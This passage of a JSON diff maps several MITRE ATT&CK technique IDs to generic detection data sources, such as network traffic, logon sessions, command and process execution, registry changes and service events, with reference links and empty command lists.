"data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1563", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "logon session" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "ip" + }, + { + "data_source": "logon session", + "definition": "Information about logon sessions being created or terminated by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + null, + [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1069.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group enumeration", + "description": "A group was listed.", + "source_data_element": "user", + "relationship": "listed", + "target_data_element": "group" + }, + { + "data_source": "group", + "definition": "Information about collections of accounts or permissions within an organization.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "group metadata", + "description": "Data and information that describe a group and activity around it such as group permissions.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "group" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1087.004", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1087.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account metadata", + "description": "Data and information that describe a user account and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "user" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process termination", + "description": "A process was terminated.", + "source_data_element": "user", + "relationship": "terminated", + "target_data_element": "process" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "user", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key deletion", + "description": "A registry key was deleted.", + "source_data_element": "process", + "relationship": "deleted", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "started", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "service", + "relationship": "stopped", + "target_data_element": null + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service metadata", + "description": "Data and information that describe a service and activity around it.", + "source_data_element": "process", + "relationship": "retrieved information about", + "target_data_element": "service" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + 